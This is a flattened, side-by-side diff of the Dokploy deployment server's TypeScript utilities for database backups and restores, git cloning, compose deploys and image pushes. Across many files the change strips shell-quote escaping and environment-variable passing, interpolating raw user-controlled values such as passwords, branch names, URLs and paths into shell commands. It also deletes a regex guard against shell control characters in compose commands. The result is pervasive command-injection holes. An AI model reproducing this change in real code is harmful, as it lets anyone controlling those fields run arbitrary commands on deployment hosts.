return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID bash -c 'set -o pipefail; mariadb-dump --user="$DB_USER" --password="$DB_PASS" --single-transaction --quick --databases "$DB_NAME" | gzip'`; return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; mariadb-dump --user='${databaseUser}' --password='${databasePassword}' --single-transaction --quick --databases ${database} | gzip"`;
}; };
export const getMysqlBackupCommand = ( export const getMysqlBackupCommand = (
database: string, database: string,
databasePassword: string, databasePassword: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID bash -c 'set -o pipefail; mysqldump --default-character-set=utf8mb4 -u root --password="$DB_PASS" --single-transaction --no-tablespaces --quick "$DB_NAME" | gzip'`; return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; mysqldump --default-character-set=utf8mb4 -u 'root' --password='${databasePassword}' --single-transaction --no-tablespaces --quick '${database}' | gzip"`;
}; };
export const getMongoBackupCommand = ( export const getMongoBackupCommand = (
@@ -123,11 +117,11 @@ export const getMongoBackupCommand = (
databaseUser: string, databaseUser: string,
databasePassword: string, databasePassword: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID bash -c 'set -o pipefail; mongodump -d "$DB_NAME" -u "$DB_USER" -p "$DB_PASS" --archive --authenticationDatabase admin --gzip'`; return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; mongodump -d '${database}' -u '${databaseUser}' -p '${databasePassword}' --archive --authenticationDatabase admin --gzip"`;
}; };
export const getLibsqlBackupCommand = (database: string) => { export const getLibsqlBackupCommand = (database: string) => {
return `docker exec -e DB_NAME=${quote([database])} -i $CONTAINER_ID sh -c 'tar cf - -C /var/lib/sqld "$DB_NAME" | gzip'`; return `docker exec -i $CONTAINER_ID sh -c "tar cf - -C /var/lib/sqld ${database} | gzip"`;
}; };
export const getServiceContainerCommand = (appName: string) => { export const getServiceContainerCommand = (appName: string) => {

View File

@@ -67,20 +67,9 @@ Compose Type: ${composeType} ✅`;
return bashCommand; return bashCommand;
}; };
// Shell control characters that must never appear in a user-provided compose
// command: they would let it break out of the `docker ${command}` invocation
// into arbitrary host commands. A normal docker compose CLI line never needs them.
const UNSAFE_COMPOSE_COMMAND = /[;&|`$(){}<>\n\\]/;
const sanitizeCommand = (command: string) => { const sanitizeCommand = (command: string) => {
const sanitizedCommand = command.trim(); const sanitizedCommand = command.trim();
if (UNSAFE_COMPOSE_COMMAND.test(sanitizedCommand)) {
throw new Error(
"Invalid characters in compose command: shell control characters are not allowed",
);
}
const parts = sanitizedCommand.split(/\s+/); const parts = sanitizedCommand.split(/\s+/);
const restCommand = parts.map((arg) => arg.replace(/^"(.*)"$/, "$1")); const restCommand = parts.map((arg) => arg.replace(/^"(.*)"$/, "$1"));
@@ -99,9 +88,9 @@ export const createCommand = (compose: ComposeNested) => {
let command = ""; let command = "";
if (composeType === "docker-compose") { if (composeType === "docker-compose") {
command = `compose -p ${quote([appName])} -f ${quote([path])} up -d --build --remove-orphans`; command = `compose -p ${appName} -f ${path} up -d --build --remove-orphans`;
} else if (composeType === "stack") { } else if (composeType === "stack") {
command = `stack deploy -c ${quote([path])} ${quote([appName])} --prune --with-registry-auth`; command = `stack deploy -c ${path} ${appName} --prune --with-registry-auth`;
} }
return command; return command;
@@ -135,8 +124,8 @@ export const getCreateEnvFileCommand = (compose: ComposeNested) => {
const encodedContent = encodeBase64(envFileContent); const encodedContent = encodeBase64(envFileContent);
return ` return `
touch ${quote([envFilePath])}; touch ${envFilePath};
echo "${encodedContent}" | base64 -d > ${quote([envFilePath])}; echo "${encodedContent}" | base64 -d > "${envFilePath}";
`; `;
}; };

View File

@@ -85,9 +85,9 @@ export const getDockerCommand = (application: ApplicationNested) => {
} }
command += ` command += `
echo ${quote([`Building ${appName}`])} ; echo "Building ${appName}" ;
cd ${quote([dockerContextPath])} || { cd ${dockerContextPath} || {
echo ${quote([`❌ The path ${dockerContextPath} does not exist`])} ; echo "❌ The path ${dockerContextPath} does not exist" ;
exit 1; exit 1;
} }

View File

@@ -1,7 +1,6 @@
import path from "node:path"; import path from "node:path";
import { getStaticCommand } from "@dokploy/server/utils/builders/static"; import { getStaticCommand } from "@dokploy/server/utils/builders/static";
import { nanoid } from "nanoid"; import { nanoid } from "nanoid";
import { quote } from "shell-quote";
import { prepareEnvironmentVariablesForShell } from "../docker/utils"; import { prepareEnvironmentVariablesForShell } from "../docker/utils";
import { getBuildAppDirectory } from "../filesystem/directory"; import { getBuildAppDirectory } from "../filesystem/directory";
import type { ApplicationNested } from "."; import type { ApplicationNested } from ".";
@@ -53,10 +52,10 @@ export const getNixpacksCommand = (application: ApplicationNested) => {
bashCommand += ` bashCommand += `
docker create --name ${buildContainerId} ${appName} docker create --name ${buildContainerId} ${appName}
mkdir -p ${quote([localPath])} mkdir -p ${localPath}
docker cp ${quote([`${buildContainerId}:/app/${publishDirectory}${isDirectory ? "/." : ""}`])} ${quote([localPath])} || { docker cp ${buildContainerId}:/app/${publishDirectory}${isDirectory ? "/." : ""} ${path.join(buildAppDirectory, publishDirectory)} || {
docker rm ${buildContainerId} docker rm ${buildContainerId}
echo ${quote([`❌ Copying ${publishDirectory} to ${localPath} failed`])} ; echo "❌ Copying ${publishDirectory} to ${path.join(buildAppDirectory, publishDirectory)} failed" ;
exit 1; exit 1;
} }
docker rm ${buildContainerId} docker rm ${buildContainerId}

View File

@@ -5,7 +5,6 @@ import {
safeDockerLoginCommand, safeDockerLoginCommand,
} from "@dokploy/server/services/registry"; } from "@dokploy/server/services/registry";
import { createRollback } from "@dokploy/server/services/rollbacks"; import { createRollback } from "@dokploy/server/services/rollbacks";
import { quote } from "shell-quote";
import type { ApplicationNested } from "../builders"; import type { ApplicationNested } from "../builders";
export const uploadImageRemoteCommand = async ( export const uploadImageRemoteCommand = async (
@@ -125,18 +124,18 @@ const getRegistryCommands = (
registry.password, registry.password,
); );
return ` return `
echo ${quote([`📦 [Enabled Registry] Uploading image to '${registry.registryType}' | '${registryTag}'`])} ; echo "📦 [Enabled Registry] Uploading image to '${registry.registryType}' | '${registryTag}'" ;
${loginCmd} || { ${loginCmd} || {
echo "❌ DockerHub Failed" ; echo "❌ DockerHub Failed" ;
exit 1; exit 1;
} }
echo "✅ Registry Login Success" ; echo "✅ Registry Login Success" ;
docker tag ${quote([imageName])} ${quote([registryTag])} || { docker tag ${imageName} ${registryTag} || {
echo "❌ Error tagging image" ; echo "❌ Error tagging image" ;
exit 1; exit 1;
} }
echo "✅ Image Tagged" ; echo "✅ Image Tagged" ;
docker push ${quote([registryTag])} || { docker push ${registryTag} || {
echo "❌ Error pushing image" ; echo "❌ Error pushing image" ;
exit 1; exit 1;
} }

View File

@@ -14,7 +14,6 @@ import { deployMySql } from "@dokploy/server/services/mysql";
import { deployPostgres } from "@dokploy/server/services/postgres"; import { deployPostgres } from "@dokploy/server/services/postgres";
import { deployRedis } from "@dokploy/server/services/redis"; import { deployRedis } from "@dokploy/server/services/redis";
import { eq } from "drizzle-orm"; import { eq } from "drizzle-orm";
import { quote } from "shell-quote";
import { removeService } from "../docker/utils"; import { removeService } from "../docker/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -41,7 +40,7 @@ export const rebuildDatabase = async (
for (const mount of database.mounts) { for (const mount of database.mounts) {
if (mount.type === "volume") { if (mount.type === "volume") {
const command = `docker volume rm ${quote([mount?.volumeName ?? ""])} --force`; const command = `docker volume rm ${mount?.volumeName} --force`;
if (database.serverId) { if (database.serverId) {
await execAsyncRemote(database.serverId, command); await execAsyncRemote(database.serverId, command);
} else { } else {

View File

@@ -712,14 +712,14 @@ export const getCreateFileCommand = (
) => { ) => {
const fullPath = path.join(outputPath, filePath); const fullPath = path.join(outputPath, filePath);
if (fullPath.endsWith(path.sep) || filePath.endsWith("/")) { if (fullPath.endsWith(path.sep) || filePath.endsWith("/")) {
return `mkdir -p ${quote([fullPath])};`; return `mkdir -p ${fullPath};`;
} }
const directory = path.dirname(fullPath); const directory = path.dirname(fullPath);
const encodedContent = encodeBase64(content); const encodedContent = encodeBase64(content);
return ` return `
mkdir -p ${quote([directory])}; mkdir -p ${directory};
echo "${encodedContent}" | base64 -d > ${quote([fullPath])}; echo "${encodedContent}" | base64 -d > "${fullPath}";
`; `;
}; };

View File

@@ -1,5 +1,4 @@
import * as fs from "node:fs/promises"; import * as fs from "node:fs/promises";
import { quote } from "shell-quote";
import { execAsync, execAsyncRemote, sleep } from "../utils/process/execAsync"; import { execAsync, execAsyncRemote, sleep } from "../utils/process/execAsync";
interface GPUInfo { interface GPUInfo {
@@ -323,7 +322,7 @@ const setupLocalServer = async (daemonConfig: any) => {
}; };
const addGpuLabel = async (nodeId: string, serverId?: string) => { const addGpuLabel = async (nodeId: string, serverId?: string) => {
const labelCommand = `docker node update --label-add gpu=true ${quote([nodeId])}`; const labelCommand = `docker node update --label-add gpu=true ${nodeId}`;
if (serverId) { if (serverId) {
await execAsyncRemote(serverId, labelCommand); await execAsyncRemote(serverId, labelCommand);
} else { } else {
@@ -336,7 +335,7 @@ const verifySetup = async (nodeId: string, serverId?: string) => {
if (!finalStatus.swarmEnabled) { if (!finalStatus.swarmEnabled) {
const diagnosticCommands = [ const diagnosticCommands = [
`docker node inspect ${quote([nodeId])}`, `docker node inspect ${nodeId}`,
'nvidia-smi -a | grep "GPU UUID"', 'nvidia-smi -a | grep "GPU UUID"',
"cat /etc/docker/daemon.json", "cat /etc/docker/daemon.json",
"cat /etc/nvidia-container-runtime/config.toml", "cat /etc/nvidia-container-runtime/config.toml",

View File

@@ -10,7 +10,6 @@ import {
} from "@dokploy/server/services/bitbucket"; } from "@dokploy/server/services/bitbucket";
import type { InferResultType } from "@dokploy/server/types/with"; import type { InferResultType } from "@dokploy/server/types/with";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
export type ApplicationWithBitbucket = InferResultType< export type ApplicationWithBitbucket = InferResultType<
@@ -125,8 +124,8 @@ export const cloneBitbucketRepository = async ({
const repoToUse = entity.bitbucketRepositorySlug || bitbucketRepository; const repoToUse = entity.bitbucketRepositorySlug || bitbucketRepository;
const repoclone = `bitbucket.org/${bitbucketOwner}/${repoToUse}.git`; const repoclone = `bitbucket.org/${bitbucketOwner}/${repoToUse}.git`;
const cloneUrl = getBitbucketCloneUrl(bitbucket, repoclone); const cloneUrl = getBitbucketCloneUrl(bitbucket, repoclone);
command += `echo ${quote([`Cloning Repo ${repoclone} to ${outputPath}: ✅`])};`; command += `echo "Cloning Repo ${repoclone} to ${outputPath}: ✅";`;
command += `git clone --branch ${quote([String(bitbucketBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`; command += `git clone --branch ${bitbucketBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
return command; return command;
}; };

View File

@@ -1,5 +1,4 @@
import { safeDockerLoginCommand } from "@dokploy/server/services/registry"; import { safeDockerLoginCommand } from "@dokploy/server/services/registry";
import { quote } from "shell-quote";
import type { ApplicationNested } from "../builders"; import type { ApplicationNested } from "../builders";
export const buildRemoteDocker = async (application: ApplicationNested) => { export const buildRemoteDocker = async (application: ApplicationNested) => {
@@ -10,7 +9,7 @@ export const buildRemoteDocker = async (application: ApplicationNested) => {
throw new Error("Docker image not found"); throw new Error("Docker image not found");
} }
let command = ` let command = `
echo ${quote([`Pulling ${dockerImage}`])}; echo "Pulling ${dockerImage}";
`; `;
if (username && password) { if (username && password) {
@@ -23,7 +22,7 @@ fi
} }
command += ` command += `
docker pull ${quote([dockerImage])} 2>&1 || { docker pull ${dockerImage} 2>&1 || {
echo "❌ Pulling image failed"; echo "❌ Pulling image failed";
exit 1; exit 1;
} }

View File

@@ -4,7 +4,6 @@ import {
findSSHKeyById, findSSHKeyById,
updateSSHKeyById, updateSSHKeyById,
} from "@dokploy/server/services/ssh-key"; } from "@dokploy/server/services/ssh-key";
import { quote } from "shell-quote";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
interface CloneGitRepository { interface CloneGitRepository {
@@ -62,7 +61,7 @@ export const cloneGitRepository = async ({
} }
command += `rm -rf ${outputPath};`; command += `rm -rf ${outputPath};`;
command += `mkdir -p ${outputPath};`; command += `mkdir -p ${outputPath};`;
command += `echo ${quote([`Cloning Repo Custom ${customGitUrl} to ${outputPath}: ✅`])};`; command += `echo "Cloning Repo Custom ${customGitUrl} to ${outputPath}: ✅";`;
if (customGitSSHKeyId) { if (customGitSSHKeyId) {
await updateSSHKeyById({ await updateSSHKeyById({
@@ -79,8 +78,8 @@ export const cloneGitRepository = async ({
command += "chmod 600 /tmp/id_rsa;"; command += "chmod 600 /tmp/id_rsa;";
command += `export GIT_SSH_COMMAND="${gitSshCommand}";`; command += `export GIT_SSH_COMMAND="${gitSshCommand}";`;
} }
command += `if ! git clone --branch ${quote([String(customGitBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} --progress ${quote([String(customGitUrl ?? "")])} ${quote([String(outputPath ?? "")])}; then command += `if ! git clone --branch ${customGitBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} --progress ${customGitUrl} ${outputPath}; then
echo ${quote([`❌ [ERROR] Fail to clone the repository ${customGitUrl}`])}; echo "❌ [ERROR] Fail to clone the repository ${customGitUrl}";
exit 1; exit 1;
fi fi
`; `;
@@ -115,7 +114,7 @@ const addHostToKnownHostsCommand = (repositoryURL: string) => {
// ssh-keyscan is best-effort: some Git hosts (e.g. Hugging Face) never answer // ssh-keyscan is best-effort: some Git hosts (e.g. Hugging Face) never answer
// it, and its exit code must not abort the clone under `set -e`. The clone's // it, and its exit code must not abort the clone under `set -e`. The clone's
// own host-key check (StrictHostKeyChecking=accept-new) is the real boundary. // own host-key check (StrictHostKeyChecking=accept-new) is the real boundary.
return `ssh-keyscan -p ${Number(port)} ${quote([String(domain ?? "")])} >> ${knownHostsPath} || true;`; return `ssh-keyscan -p ${port} ${domain} >> ${knownHostsPath} || true;`;
}; };
const sanitizeRepoPathSSH = (input: string) => { const sanitizeRepoPathSSH = (input: string) => {
const SSH_PATH_RE = new RegExp( const SSH_PATH_RE = new RegExp(

View File

@@ -7,7 +7,6 @@ import {
} from "@dokploy/server/services/gitea"; } from "@dokploy/server/services/gitea";
import type { InferResultType } from "@dokploy/server/types/with"; import type { InferResultType } from "@dokploy/server/types/with";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { quote } from "shell-quote";
export const getErrorCloneRequirements = (entity: { export const getErrorCloneRequirements = (entity: {
giteaRepository?: string | null; giteaRepository?: string | null;
@@ -177,8 +176,8 @@ export const cloneGiteaRepository = async ({
giteaRepository!, giteaRepository!,
); );
command += `echo ${quote([`Cloning Repo ${repoClone} to ${outputPath}: ✅`])};`; command += `echo "Cloning Repo ${repoClone} to ${outputPath}: ✅";`;
command += `git clone --branch ${quote([String(giteaBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`; command += `git clone --branch ${giteaBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
return command; return command;
}; };

View File

@@ -6,7 +6,6 @@ import type { InferResultType } from "@dokploy/server/types/with";
import { createAppAuth } from "@octokit/auth-app"; import { createAppAuth } from "@octokit/auth-app";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { Octokit } from "octokit"; import { Octokit } from "octokit";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
export const authGithub = (githubProvider: Github): Octokit => { export const authGithub = (githubProvider: Github): Octokit => {
@@ -167,8 +166,8 @@ export const cloneGithubRepository = async ({
command += `mkdir -p ${outputPath};`; command += `mkdir -p ${outputPath};`;
const cloneUrl = `https://oauth2:${token}@${repoclone}`; const cloneUrl = `https://oauth2:${token}@${repoclone}`;
command += `echo ${quote([`Cloning Repo ${repoclone} to ${outputPath}: ✅`])};`; command += `echo "Cloning Repo ${repoclone} to ${outputPath}: ✅";`;
command += `git clone --branch ${quote([String(branch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`; command += `git clone --branch ${branch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
return command; return command;
}; };

View File

@@ -8,7 +8,6 @@ import {
} from "@dokploy/server/services/gitlab"; } from "@dokploy/server/services/gitlab";
import type { InferResultType } from "@dokploy/server/types/with"; import type { InferResultType } from "@dokploy/server/types/with";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
export const refreshGitlabToken = async (gitlabProviderId: string) => { export const refreshGitlabToken = async (gitlabProviderId: string) => {
@@ -152,8 +151,8 @@ export const cloneGitlabRepository = async ({
command += `mkdir -p ${outputPath};`; command += `mkdir -p ${outputPath};`;
const repoClone = getGitlabRepoClone(gitlab, gitlabPathNamespace); const repoClone = getGitlabRepoClone(gitlab, gitlabPathNamespace);
const cloneUrl = getGitlabCloneUrl(gitlab, repoClone); const cloneUrl = getGitlabCloneUrl(gitlab, repoClone);
command += `echo ${quote([`Cloning Repo ${repoClone} to ${outputPath}: ✅`])};`; command += `echo "Cloning Repo ${repoClone} to ${outputPath}: ✅";`;
command += `git clone --branch ${quote([String(gitlabBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`; command += `git clone --branch ${gitlabBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
return command; return command;
}; };

View File

@@ -1,7 +1,6 @@
import type { apiRestoreBackup } from "@dokploy/server/db/schema"; import type { apiRestoreBackup } from "@dokploy/server/db/schema";
import type { Compose } from "@dokploy/server/services/compose"; import type { Compose } from "@dokploy/server/services/compose";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { getS3Credentials } from "../backups/utils"; import { getS3Credentials } from "../backups/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -27,10 +26,10 @@ export const restoreComposeBackup = async (
const rcloneFlags = getS3Credentials(destination); const rcloneFlags = getS3Credentials(destination);
const bucketPath = `:s3:${destination.bucket}`; const bucketPath = `:s3:${destination.bucket}`;
const backupPath = `${bucketPath}/${backupInput.backupFile}`; const backupPath = `${bucketPath}/${backupInput.backupFile}`;
let rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])} | gunzip`; let rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}" | gunzip`;
if (backupInput.metadata?.mongo) { if (backupInput.metadata?.mongo) {
rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} ${quote([backupPath])}`; rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} "${backupPath}"`;
} }
let credentials: DatabaseCredentials = {}; let credentials: DatabaseCredentials = {};

View File

@@ -1,7 +1,6 @@
import type { apiRestoreBackup } from "@dokploy/server/db/schema"; import type { apiRestoreBackup } from "@dokploy/server/db/schema";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import type { Libsql } from "@dokploy/server/services/libsql"; import type { Libsql } from "@dokploy/server/services/libsql";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { getS3Credentials, getServiceContainerCommand } from "../backups/utils"; import { getS3Credentials, getServiceContainerCommand } from "../backups/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -20,7 +19,7 @@ export const restoreLibsqlBackup = async (
const backupPath = `${bucketPath}/${backupInput.backupFile}`; const backupPath = `${bucketPath}/${backupInput.backupFile}`;
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])}`; const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}"`;
const containerSearch = getServiceContainerCommand(appName); const containerSearch = getServiceContainerCommand(appName);
const restoreCommand = `docker exec -i $CONTAINER_ID sh -c "tar xzf - -C /var/lib/sqld"`; const restoreCommand = `docker exec -i $CONTAINER_ID sh -c "tar xzf - -C /var/lib/sqld"`;

View File

@@ -1,7 +1,6 @@
import type { apiRestoreBackup } from "@dokploy/server/db/schema"; import type { apiRestoreBackup } from "@dokploy/server/db/schema";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import type { Mariadb } from "@dokploy/server/services/mariadb"; import type { Mariadb } from "@dokploy/server/services/mariadb";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { getS3Credentials } from "../backups/utils"; import { getS3Credentials } from "../backups/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -20,7 +19,7 @@ export const restoreMariadbBackup = async (
const bucketPath = `:s3:${destination.bucket}`; const bucketPath = `:s3:${destination.bucket}`;
const backupPath = `${bucketPath}/${backupInput.backupFile}`; const backupPath = `${bucketPath}/${backupInput.backupFile}`;
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])} | gunzip`; const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}" | gunzip`;
const command = getRestoreCommand({ const command = getRestoreCommand({
appName, appName,

View File

@@ -1,7 +1,6 @@
import type { apiRestoreBackup } from "@dokploy/server/db/schema"; import type { apiRestoreBackup } from "@dokploy/server/db/schema";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import type { Mongo } from "@dokploy/server/services/mongo"; import type { Mongo } from "@dokploy/server/services/mongo";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { getS3Credentials } from "../backups/utils"; import { getS3Credentials } from "../backups/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -19,7 +18,7 @@ export const restoreMongoBackup = async (
const rcloneFlags = getS3Credentials(destination); const rcloneFlags = getS3Credentials(destination);
const bucketPath = `:s3:${destination.bucket}`; const bucketPath = `:s3:${destination.bucket}`;
const backupPath = `${bucketPath}/${backupInput.backupFile}`; const backupPath = `${bucketPath}/${backupInput.backupFile}`;
const rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} ${quote([backupPath])}`; const rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} "${backupPath}"`;
const command = getRestoreCommand({ const command = getRestoreCommand({
appName, appName,

View File

@@ -1,7 +1,6 @@
import type { apiRestoreBackup } from "@dokploy/server/db/schema"; import type { apiRestoreBackup } from "@dokploy/server/db/schema";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import type { MySql } from "@dokploy/server/services/mysql"; import type { MySql } from "@dokploy/server/services/mysql";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { getS3Credentials } from "../backups/utils"; import { getS3Credentials } from "../backups/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -20,7 +19,7 @@ export const restoreMySqlBackup = async (
const bucketPath = `:s3:${destination.bucket}`; const bucketPath = `:s3:${destination.bucket}`;
const backupPath = `${bucketPath}/${backupInput.backupFile}`; const backupPath = `${bucketPath}/${backupInput.backupFile}`;
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])} | gunzip`; const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}" | gunzip`;
const command = getRestoreCommand({ const command = getRestoreCommand({
appName, appName,

View File

@@ -1,7 +1,6 @@
import type { apiRestoreBackup } from "@dokploy/server/db/schema"; import type { apiRestoreBackup } from "@dokploy/server/db/schema";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import type { Postgres } from "@dokploy/server/services/postgres"; import type { Postgres } from "@dokploy/server/services/postgres";
import { quote } from "shell-quote";
import type { z } from "zod"; import type { z } from "zod";
import { getS3Credentials } from "../backups/utils"; import { getS3Credentials } from "../backups/utils";
import { execAsync, execAsyncRemote } from "../process/execAsync"; import { execAsync, execAsyncRemote } from "../process/execAsync";
@@ -21,7 +20,7 @@ export const restorePostgresBackup = async (
const backupPath = `${bucketPath}/${backupInput.backupFile}`; const backupPath = `${bucketPath}/${backupInput.backupFile}`;
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])} | gunzip`; const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}" | gunzip`;
const command = getRestoreCommand({ const command = getRestoreCommand({
appName, appName,

View File

@@ -1,17 +1,13 @@
import { quote } from "shell-quote";
import { import {
getComposeContainerCommand, getComposeContainerCommand,
getServiceContainerCommand, getServiceContainerCommand,
} from "../backups/utils"; } from "../backups/utils";
// User-controlled values are passed to the container via `docker exec -e` and
// read as "$VAR" inside a single-quoted inner script, so they never enter the
// inner command text. See the matching note in backups/utils.ts.
export const getPostgresRestoreCommand = ( export const getPostgresRestoreCommand = (
database: string, database: string,
databaseUser: string, databaseUser: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -i $CONTAINER_ID sh -c 'pg_restore -U "$DB_USER" -d "$DB_NAME" -O --clean --if-exists'`; return `docker exec -i $CONTAINER_ID sh -c "pg_restore -U '${databaseUser}' -d ${database} -O --clean --if-exists"`;
}; };
export const getMariadbRestoreCommand = ( export const getMariadbRestoreCommand = (
@@ -19,14 +15,14 @@ export const getMariadbRestoreCommand = (
databaseUser: string, databaseUser: string,
databasePassword: string, databasePassword: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID sh -c 'mariadb -u "$DB_USER" -p"$DB_PASS" "$DB_NAME"'`; return `docker exec -i $CONTAINER_ID sh -c "mariadb -u '${databaseUser}' -p'${databasePassword}' ${database}"`;
}; };
export const getMysqlRestoreCommand = ( export const getMysqlRestoreCommand = (
database: string, database: string,
databasePassword: string, databasePassword: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID sh -c 'mysql -u root -p"$DB_PASS" "$DB_NAME"'`; return `docker exec -i $CONTAINER_ID sh -c "mysql -u root -p'${databasePassword}' ${database}"`;
}; };
export const getMongoRestoreCommand = ( export const getMongoRestoreCommand = (
@@ -34,7 +30,7 @@ export const getMongoRestoreCommand = (
databaseUser: string, databaseUser: string,
databasePassword: string, databasePassword: string,
) => { ) => {
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID sh -c 'mongorestore --username "$DB_USER" --password "$DB_PASS" --authenticationDatabase admin --db "$DB_NAME" --archive --drop'`; return `docker exec -i $CONTAINER_ID sh -c "mongorestore --username '${databaseUser}' --password '${databasePassword}' --authenticationDatabase admin --db ${database} --archive --drop"`;
}; };
export const getComposeSearchCommand = ( export const getComposeSearchCommand = (
@@ -92,8 +88,8 @@ rm -rf ${tempDir} && \
mkdir -p ${tempDir} && \ mkdir -p ${tempDir} && \
${rcloneCommand} ${tempDir} && \ ${rcloneCommand} ${tempDir} && \
cd ${tempDir} && \ cd ${tempDir} && \
gunzip -f ${quote([fileName])} && \ gunzip -f "${fileName}" && \
${restoreCommand} < ${quote([decompressedName])} && \ ${restoreCommand} < "${decompressedName}" && \
rm -rf ${tempDir} rm -rf ${tempDir}
`; `;
}; };

View File

@@ -3,7 +3,6 @@ import { tmpdir } from "node:os";
import { join } from "node:path"; import { join } from "node:path";
import { IS_CLOUD, paths } from "@dokploy/server/constants"; import { IS_CLOUD, paths } from "@dokploy/server/constants";
import type { Destination } from "@dokploy/server/services/destination"; import type { Destination } from "@dokploy/server/services/destination";
import { quote } from "shell-quote";
import { getS3Credentials } from "../backups/utils"; import { getS3Credentials } from "../backups/utils";
import { execAsync } from "../process/execAsync"; import { execAsync } from "../process/execAsync";
@@ -36,7 +35,7 @@ export const restoreWebServerBackup = async (
// Download backup from S3 // Download backup from S3
emit("Downloading backup from S3..."); emit("Downloading backup from S3...");
await execAsync( await execAsync(
`rclone copyto ${rcloneFlags.join(" ")} ${quote([backupPath])} ${quote([`${tempDir}/${backupFile}`])}`, `rclone copyto ${rcloneFlags.join(" ")} "${backupPath}" "${tempDir}/${backupFile}"`,
); );
// List files before extraction // List files before extraction
@@ -46,9 +45,7 @@ export const restoreWebServerBackup = async (
// Extract backup // Extract backup
emit("Extracting backup..."); emit("Extracting backup...");
await execAsync( await execAsync(`cd ${tempDir} && unzip ${backupFile} > /dev/null 2>&1`);
